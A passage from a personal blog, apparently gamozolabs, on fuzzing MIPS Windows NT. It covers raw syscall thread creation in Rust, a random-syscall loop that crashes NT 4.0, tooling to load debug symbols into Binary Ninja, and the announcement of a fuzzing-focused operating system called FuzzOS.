<span class="k">let</span> <span class="k">mut</span> <span class="n">context</span><span class="p">:</span> <span class="n">Context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nn">core</span><span class="p">::</span><span class="nn">mem</span><span class="p">::</span><span class="nf">zeroed</span><span class="p">()</span> <span class="p">};</span>
<span class="c">// Allocate and leak a stack for the thread</span>
<span class="k">let</span> <span class="n">stack</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">4096</span><span class="p">]</span><span class="nf">.leak</span><span class="p">();</span>
<span class="c">// Initial TEB, maybe some stack stuff in here!?</span>
<span class="k">let</span> <span class="n">initial_teb</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u32</span><span class="p">;</span> <span class="mi">5</span><span class="p">];</span>
<span class="c">/// External thread entry point</span>
<span class="k">extern</span> <span class="k">fn</span> <span class="n">entry</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span><span class="p">(</span><span class="n">func</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">F</span><span class="p">,</span>
<span class="n">ret</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>></span><span class="p">,</span>
<span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="o">!</span>
<span class="k">where</span> <span class="n">F</span><span class="p">:</span> <span class="nf">FnOnce</span><span class="p">()</span> <span class="k">-></span> <span class="n">T</span><span class="p">,</span>
<span class="n">F</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span><span class="p">,</span>
<span class="n">T</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span> <span class="p">{</span>
<span class="c">// Create a scope so that we drop `Box` and `Arc`</span>
<span class="p">{</span>
<span class="c">// Re-box the FFI'd type</span>
<span class="k">let</span> <span class="n">func</span><span class="p">:</span> <span class="nb">Box</span><span class="o"><</span><span class="n">F</span><span class="o">></span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="nn">Box</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">func</span><span class="p">)</span>
<span class="p">};</span>
<span class="c">// Re-box the return type</span>
<span class="k">let</span> <span class="n">ret</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>>></span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="nn">Arc</span><span class="p">::</span><span class="nf">from_raw</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span>
<span class="p">};</span>
<span class="c">// Call the closure and save the return</span>
<span class="k">unsafe</span> <span class="p">{</span> <span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="o">*</span><span class="n">ret</span><span class="nf">.get</span><span class="p">())</span><span class="nf">.write</span><span class="p">(</span><span class="nf">func</span><span class="p">());</span> <span class="p">}</span>
<span class="p">}</span>
<span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">rsize</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Free the stack and then exit the thread. We do this in one assembly</span>
<span class="c">// block to ensure we don't touch any stack memory during this stage</span>
<span class="c">// as we are freeing the stack.</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
// Set the link register
jal 2f
// Exit thread
jal 3f
break
2:
// NtFreeVirtualMemory()
li $v0, {free}
syscall
3:
// NtTerminateThread()
li $v0, {terminate}
li $a0, -2 // GetCurrentThread()
li $a1, 0 // exit code
syscall
"#</span><span class="p">,</span> <span class="n">terminate</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">TerminateThread</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="n">free</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$4"</span><span class="p">)</span> <span class="o">!</span><span class="mi">0u</span><span class="n">size</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$5"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">stack</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$6"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">rsize</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$7"</span><span class="p">)</span> <span class="n">MEM_RELEASE</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">let</span> <span class="n">rbox</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
<span class="c">/// Control context</span>
<span class="k">const</span> <span class="n">CONTEXT_CONTROL</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="c">/// Floating point context</span>
<span class="k">const</span> <span class="n">CONTEXT_FLOATING_POINT</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
<span class="c">/// Integer context</span>
<span class="k">const</span> <span class="n">CONTEXT_INTEGER</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span>
<span class="c">// Set the flags for the registers we want to control</span>
<span class="n">context</span><span class="py">.context.bits64.flags</span> <span class="o">=</span>
<span class="n">CONTEXT_CONTROL</span> <span class="p">|</span> <span class="n">CONTEXT_FLOATING_POINT</span> <span class="p">|</span> <span class="n">CONTEXT_INTEGER</span><span class="p">;</span>
<span class="c">// Thread entry point</span>
<span class="n">context</span><span class="py">.context.bits64.fir</span> <span class="o">=</span> <span class="nn">entry</span><span class="p">::</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span> <span class="k">as</span> <span class="nb">usize</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">;</span>
<span class="c">// Set `$a0` argument</span>
<span class="k">let</span> <span class="n">cbox</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">F</span> <span class="o">=</span> <span class="nn">Box</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">f</span><span class="p">));</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">cbox</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Create return storage in `$a1`</span>
<span class="k">let</span> <span class="n">rbox</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="n">UnsafeCell</span><span class="o"><</span><span class="n">MaybeUninit</span><span class="o"><</span><span class="n">T</span><span class="o">>>></span> <span class="o">=</span>
<span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">UnsafeCell</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">MaybeUninit</span><span class="p">::</span><span class="nf">uninit</span><span class="p">()));</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="n">rbox</span><span class="nf">.clone</span><span class="p">())</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Pass in stack in `$a2`</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="c">// Set the 64-bit `$sp` to the end of the stack</span>
<span class="n">context</span><span class="py">.context.bits64.int</span><span class="p">[</span><span class="mi">29</span><span class="p">]</span> <span class="o">=</span>
<span class="n">stack</span><span class="nf">.as_mut_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span> <span class="o">+</span> <span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
<span class="n">rbox</span>
<span class="p">};</span>
<span class="c">// Create the thread</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall8</span><span class="p">(</span>
<span class="c">// OUT PHANDLE ThreadHandle</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">handle</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN ACCESS_MASK DesiredAccess</span>
<span class="mi">0x1f03ff</span><span class="p">,</span>
<span class="c">// IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// IN HANDLE ProcessHandle</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// OUT PCLIENT_ID ClientId</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">client_id</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN PCONTEXT ThreadContext,</span>
<span class="nd">addr_of!</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN PINITIAL_TEB InitialTeb</span>
<span class="nd">addr_of!</span><span class="p">(</span><span class="n">initial_teb</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// IN BOOLEAN CreateSuspended</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// Syscall number</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">CreateThread</span> <span class="k">as</span> <span class="nb">usize</span>
<span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// Convert error to Rust error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(</span><span class="nf">JoinHandle</span><span class="p">(</span><span class="nf">Handle</span><span class="p">(</span><span class="n">handle</span><span class="p">),</span> <span class="n">rbox</span><span class="p">))</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="fun-oddities">Fun oddities</h4>
<p>While doing this work, it was fun to notice that threads do not seem to
die upon crashing. It would appear that the thread initialization thunk that
Windows normally shims in when you create a thread registers some sort of
exception handler, which fires on a crash so the thread itself can report the
information to the kernel. Since we create our threads raw, without that
thunk, at least in this version of NT the thread did not die, and the process
didn’t crash as a whole.</p>
<h2 id="fuzzing-windows-nt">“Fuzzing” Windows NT</h2>
<p><img src="/assets/nt4_bsod.png" alt="Windows NT 4.0 blue screen of death" /></p>
<p>Of course, the point of this project was to fuzz Windows NT. Well, it turns out
that literally the very first thing we did… randomly invoking a syscall… was
all it took.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Worker thread for fuzzing</span>
<span class="k">fn</span> <span class="nf">worker</span><span class="p">(</span><span class="n">id</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Create an RNG</span>
<span class="k">let</span> <span class="n">rng</span> <span class="o">=</span> <span class="nn">Rng</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">0xe06fc2cdf7b80594</span> <span class="o">+</span> <span class="n">id</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">);</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nn">syscall</span><span class="p">::</span><span class="nf">syscall0</span><span class="p">(</span><span class="n">rng</span><span class="nf">.next</span><span class="p">()</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Yep, that’s all it took.</p>
<h2 id="debugging-windows-nt-blue-screens">Debugging Windows NT Blue Screens</h2>
<p>Unfortunately, we’re on a pretty legacy system and our tools for debugging
are limited, especially for MIPS executables for Windows. It turns out that
Ghidra isn’t able to load MIPS PEs at all, and Binary Ninja has no support for
the debug information.</p>
<p>We started by writing a tool that would scrape the symbol output and
information from <code class="language-plaintext highlighter-rouge">mipskd</code> (which works very similarly to modern KD), but
unfortunately one of the members of my chat claimed a chat reward to have me
drop whatever I was doing and rewrite it in Rust.</p>
<p>At the time, we were writing a hacky batch script to dump symbols in a way
we could save to disk, rip out of the VM, and then use in Binary Ninja.
However, well, now I had to do this all in Rust.</p>
<h3 id="parsing-dbg-coff">Parsing DBG COFF</h3>
<p>The debug files that ship with Windows NT on the ISO are <code class="language-plaintext highlighter-rouge">DI</code> magic-ed files.
These are separated debug information with a slightly specialized debug header
with COFF symbol information. This format is actually relatively well
documented, so writing the parser wasn’t too much effort. Most of the
development time was trying to figure out how to correlate source line
information to addresses. Ultimately, the only possible method to do this that
I found was to use the statefulness of the sequence of debug symbol entries to
associate the current file definition (in sequence with debug symbols) with
symbols that are described after it.</p>
<p>I don’t know if this is the correct design, as I didn’t find it documented
anywhere. The format is standardized in a few documents, but these DBG files
did not follow that standard.</p>
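To illustrate the stateful association described above, here’s a toy model. The `DbgEntry` variants are simplified stand-ins for the real COFF records, not the actual layout:

```rust
/// Simplified debug-symbol stream entry; the real COFF records carry much
/// more, this just models the statefulness of the stream.
enum DbgEntry {
    /// Defines the current source file for all subsequent records
    SourceFile(&'static str),
    /// A line-number record at some address
    Line { addr: u32, line: u32 },
}

/// Walk the entries in order, associating each line record with the most
/// recently seen source-file record.
fn associate(entries: &[DbgEntry]) -> Vec<(String, u32, u32)> {
    let mut cur_file = String::new();
    let mut out = Vec::new();
    for entry in entries {
        match entry {
            // Update the "current file" state
            DbgEntry::SourceFile(name) => cur_file = name.to_string(),
            // Attribute the line record to whatever file is current
            DbgEntry::Line { addr, line } => {
                out.push((cur_file.clone(), *addr, *line));
            }
        }
    }
    out
}

fn main() {
    let entries = [
        DbgEntry::SourceFile("pinball.c"),
        DbgEntry::Line { addr: 0x1000, line: 10 },
        DbgEntry::SourceFile("table.c"),
        DbgEntry::Line { addr: 0x2000, line: 42 },
    ];
    // Emit in the same `S <addr> <source>:<line>` shape as `coff_nm`
    for (file, addr, line) in associate(&entries) {
        println!("S {:08x} {}:{}", addr, file, line);
    }
}
```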
<p>I ultimately wrote <a href="https://github.com/gamozolabs/coff_nm">coff_nm</a> for this
parsing, which simply writes to <code class="language-plaintext highlighter-rouge">stdout</code> with the format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>
</code></pre></div></div>
<h3 id="binary-ninja">Binary Ninja</h3>
<p><img src="/assets/binja_pinball.png" alt="Binary Ninja with Pinball.exe open and symbolized" /></p>
<p>(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet
Pinball game you know and love)</p>
<p>I wrote a very simple Binary Ninja script that allowed me to import this debug
information into the program:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">binaryninja</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span><span class="p">,</span> <span class="n">subprocess</span>
<span class="k">def</span> <span class="nf">load_dbg_file</span><span class="p">(</span><span class="n">bv</span><span class="p">,</span> <span class="n">function</span><span class="p">):</span>
<span class="n">rex</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"^([FGS]) ([0-9a-f]{8}) (.*)$"</span><span class="p">)</span>
<span class="c1"># Prompt for debug file input
</span> <span class="n">dbg_file</span> <span class="o">=</span> <span class="n">interaction</span> \
<span class="p">.</span><span class="n">get_open_filename_input</span><span class="p">(</span><span class="s">"Debug file"</span><span class="p">,</span>
<span class="s">"COFF Debug Files (*.dbg *.db_)"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">dbg_file</span><span class="p">:</span>
<span class="c1"># Parse the debug file
</span> <span class="n">output</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">check_output</span><span class="p">([</span><span class="s">"dbgparse"</span><span class="p">,</span> <span class="n">dbg_file</span><span class="p">]).</span><span class="n">decode</span><span class="p">()</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">output</span><span class="p">.</span><span class="n">splitlines</span><span class="p">():</span>
<span class="p">(</span><span class="n">typ</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">=</span> <span class="n">rex</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="n">line</span><span class="p">).</span><span class="n">groups</span><span class="p">()</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">bv</span><span class="p">.</span><span class="n">start</span> <span class="o">+</span> <span class="nb">int</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>
<span class="p">(</span><span class="n">mangle_typ</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">)</span> <span class="o">=</span> <span class="n">demangle</span><span class="p">.</span><span class="n">demangle_ms</span><span class="p">(</span><span class="n">bv</span><span class="p">.</span><span class="n">arch</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">type</span><span class="p">(</span><span class="n">mangle_name</span><span class="p">)</span> <span class="o">==</span> <span class="nb">list</span><span class="p">:</span>
<span class="n">mangle_name</span> <span class="o">=</span> <span class="s">"::"</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">mangle_name</span><span class="p">)</span>
<span class="k">if</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"F"</span><span class="p">:</span>
<span class="c1"># Function
</span> <span class="n">bv</span><span class="p">.</span><span class="n">create_user_function</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
<span class="n">bv</span><span class="p">.</span><span class="n">define_user_symbol</span><span class="p">(</span><span class="n">Symbol</span><span class="p">(</span><span class="n">SymbolType</span><span class="p">.</span><span class="n">FunctionSymbol</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">,</span> <span class="n">raw_name</span><span class="o">=</span><span class="n">name</span><span class="p">))</span>
<span class="k">if</span> <span class="n">mangle_typ</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">bv</span><span class="p">.</span><span class="n">get_function_at</span><span class="p">(</span><span class="n">addr</span><span class="p">).</span><span class="n">function_type</span> <span class="o">=</span> <span class="n">mangle_typ</span>
<span class="k">elif</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"G"</span><span class="p">:</span>
<span class="c1"># Global
</span> <span class="n">bv</span><span class="p">.</span><span class="n">define_user_symbol</span><span class="p">(</span><span class="n">Symbol</span><span class="p">(</span><span class="n">SymbolType</span><span class="p">.</span><span class="n">DataSymbol</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">mangle_name</span><span class="p">,</span> <span class="n">raw_name</span><span class="o">=</span><span class="n">name</span><span class="p">))</span>
<span class="k">elif</span> <span class="n">typ</span> <span class="o">==</span> <span class="s">"S"</span><span class="p">:</span>
<span class="c1"># Sourceline
</span> <span class="n">bv</span><span class="p">.</span><span class="n">set_comment_at</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span>
<span class="c1"># Update analysis
</span> <span class="n">bv</span><span class="p">.</span><span class="n">update_analysis</span><span class="p">()</span>
<span class="n">PluginCommand</span><span class="p">.</span><span class="n">register_for_address</span><span class="p">(</span><span class="s">"Load COFF DBG file"</span><span class="p">,</span> <span class="s">"Load COFF .DBG file from disk"</span><span class="p">,</span> <span class="n">load_dbg_file</span><span class="p">)</span>
</code></pre></div></div>
<p>This simply prompts the user for a file, invokes the <code class="language-plaintext highlighter-rouge">dbgparse</code> tool, parses
the output, and then uses Binary Ninja’s demangler to demangle names and
extract type information (from mangled names). The script tells Binja which
functions exist, their names, and their types (from the mangling
information); it also applies symbols for globals, and finally it applies
source line information as comments.</p>
<p>Thus, we now have a great environment for reading and reviewing NT code and
analyzing the crashes we find with our “fuzzer”!</p>
<h2 id="conclusion">Conclusion</h2>
<p>Well, this has gotten a lot longer than expected, and it’s also 5am, so I’m
just going to upload this as is; hopefully it’s not a mess, as I’m not reading
through it to check for errors. Anyways, I hope you enjoyed this write-up of
the 3 streams so far on this project. It’s been a really fun project, and I
hope that you tune into my live streams and watch the next steps unfold!</p>
<p>~Gamozo</p>
<h1 id="fuzzos">FuzzOS</h1>
<p>Originally published 2020-12-06 at <a href="https://gamozolabs.github.io/fuzzing/2020/12/06/fuzzos">https://gamozolabs.github.io/fuzzing/2020/12/06/fuzzos</a></p>
<h2 id="summary">Summary</h2>
<p>We’re going to work on an <em>operating system</em> which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!</p>
<h2 id="when">When</h2>
<p>Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!</p>
<p>Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!</p>
<h2 id="where">Where</h2>
<p>You’ll be able to find the streams live on my <a href="https://twitch.tv/gamozo">Twitch Channel</a>, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my <a href="https://www.youtube.com/user/gamozolabs">YouTube Channel</a>! Don’t forget to like, comment, and subscribe, of course.</p>
<h2 id="what">What</h2>
<p>So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.</p>
<p>We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.</p>
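As a toy userspace model of that page-restore idea (not the actual OS design, which would operate on page tables rather than `Vec`s), differential resets might look like this:

```rust
use std::collections::BTreeSet;

const PAGE_SIZE: usize = 4096;

/// Toy model of snapshot/restore: a pristine image, the live memory for a
/// fuzz case, and the set of pages dirtied during that case.
struct Memory {
    snapshot: Vec<u8>,
    current: Vec<u8>,
    dirty: BTreeSet<usize>,
}

impl Memory {
    fn new(image: Vec<u8>) -> Self {
        Self { current: image.clone(), snapshot: image, dirty: BTreeSet::new() }
    }

    /// Write during a fuzz case, recording which pages were touched
    fn write(&mut self, addr: usize, data: &[u8]) {
        assert!(!data.is_empty(), "toy model assumes non-empty writes");
        for page in addr / PAGE_SIZE..=(addr + data.len() - 1) / PAGE_SIZE {
            self.dirty.insert(page);
        }
        self.current[addr..addr + data.len()].copy_from_slice(data);
    }

    /// Restore only the dirtied pages; this is the key to fast per-case
    /// resets, as untouched memory costs nothing
    fn reset(&mut self) {
        for &page in &self.dirty {
            let ofs = page * PAGE_SIZE;
            self.current[ofs..ofs + PAGE_SIZE]
                .copy_from_slice(&self.snapshot[ofs..ofs + PAGE_SIZE]);
        }
        self.dirty.clear();
    }
}

fn main() {
    let mut mem = Memory::new(vec![0u8; 16 * PAGE_SIZE]);
    mem.write(0x1234, b"fuzz");
    mem.reset();
    assert_eq!(mem.current, mem.snapshot);
    assert!(mem.dirty.is_empty());
    println!("reset restored only the dirtied pages");
}
```

In a real kernel the dirty set would come from hardware (dirty bits in the page tables) instead of being tracked by hand, but the reset cost scaling with pages touched, not total memory, is the same.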
<p>To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.</p>
<h3 id="os">OS</h3>
<p>We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.</p>
<h3 id="acpi">ACPI</h3>
<p>We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.</p>
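<p>As a rough illustration of the first step of ACPI parsing, here is a minimal sketch in Rust. All ACPI tables (including the SRAT, which holds NUMA topology) share a 36-byte SDT header whose checksum field makes every byte of the table sum to zero mod 256; the fake table built here is purely for illustration:</p>

```rust
// Validate an ACPI table before trusting its contents. The checksum
// byte is chosen so that all bytes of the table sum to 0 (mod 256).
fn acpi_checksum_ok(table: &[u8]) -> bool {
    table.iter().fold(0u8, |acc, &b| acc.wrapping_add(b)) == 0
}

fn main() {
    // Build a fake 36-byte SDT header with a correct checksum
    let mut table = [0u8; 36];
    table[0..4].copy_from_slice(b"SRAT"); // NUMA topology lives in the SRAT
    table[4..8].copy_from_slice(&36u32.to_le_bytes()); // Length field
    let sum = table.iter().fold(0u8, |acc, &b| acc.wrapping_add(b));
    table[9] = (!sum).wrapping_add(1); // Checksum byte at offset 9
    assert!(acpi_checksum_ok(&table));
    println!("checksum ok");
}
```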
<h3 id="multi-processing">Multi-processing</h3>
<p>Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.</p>
<h3 id="10gbit-networking--tcp-stack">10gbit networking + TCP stack</h3>
<p>Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from <a href="https://github.com/gamozolabs/chocolate_milk">Chocolate Milk</a>.</p>
<hr />
<h2 id="interesting-stuff">Interesting stuff</h2>
<p>Okay, that stuff was boring, lets talk about the fun parts!</p>
<h3 id="exotic-memory-model">Exotic memory model</h3>
<p>Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.</p>
<p>What’s the solution? Well of course, we’ll have every single core on the system running its own address space. This means there is no shared memory between cores (with some very, very minor exceptions). Not only does this lead to exceptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with an advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.</p>
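<p>The message-passing model above can be sketched with a minimal, standard-library-only example. The <code>Message</code> type and its wire format are hypothetical, invented purely for illustration; the point is that any message which round-trips through bytes can be framed onto a TCP stream and thus sent to another core or another machine identically:</p>

```rust
use std::io::{Cursor, Read};

// Hypothetical inter-core message: no shared memory, everything is
// passed by value and can be framed onto a TCP stream.
#[derive(Debug, PartialEq)]
enum Message {
    // Request that a worker reset VM `id` back to its snapshot
    ResetVm { id: u64 },
    // Report newly seen coverage offsets back to a coordinator
    Coverage { offsets: Vec<u64> },
}

impl Message {
    // Serialize into a simple tagged little-endian byte format
    fn serialize(&self, out: &mut Vec<u8>) {
        match self {
            Message::ResetVm { id } => {
                out.push(0);
                out.extend_from_slice(&id.to_le_bytes());
            }
            Message::Coverage { offsets } => {
                out.push(1);
                out.extend_from_slice(&(offsets.len() as u64).to_le_bytes());
                for o in offsets {
                    out.extend_from_slice(&o.to_le_bytes());
                }
            }
        }
    }

    // Deserialize one message from any reader (eg. a TcpStream)
    fn deserialize(mut rdr: impl Read) -> std::io::Result<Message> {
        let mut tag = [0u8; 1];
        rdr.read_exact(&mut tag)?;
        let mut word = [0u8; 8];
        Ok(match tag[0] {
            0 => {
                rdr.read_exact(&mut word)?;
                Message::ResetVm { id: u64::from_le_bytes(word) }
            }
            _ => {
                rdr.read_exact(&mut word)?;
                let len = u64::from_le_bytes(word);
                let mut offsets = Vec::new();
                for _ in 0..len {
                    rdr.read_exact(&mut word)?;
                    offsets.push(u64::from_le_bytes(word));
                }
                Message::Coverage { offsets }
            }
        })
    }
}

fn main() {
    // Round-trip a message as it would go over a socket
    let msg = Message::Coverage { offsets: vec![0x1337, 0xbeef] };
    let mut buf = Vec::new();
    msg.serialize(&mut buf);
    let back = Message::deserialize(Cursor::new(buf)).unwrap();
    assert_eq!(back, msg);
    println!("round-trip ok");
}
```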
<p>This has some awesome properties since we no longer need any locks on our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens of thousands of cycles.</p>
<p>I used this model in <a href="https://gamozolabs.github.io/metrology/2019/08/19/sushi_roll.html">Sushi Roll</a>, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.</p>
<h3 id="scaling">Scaling</h3>
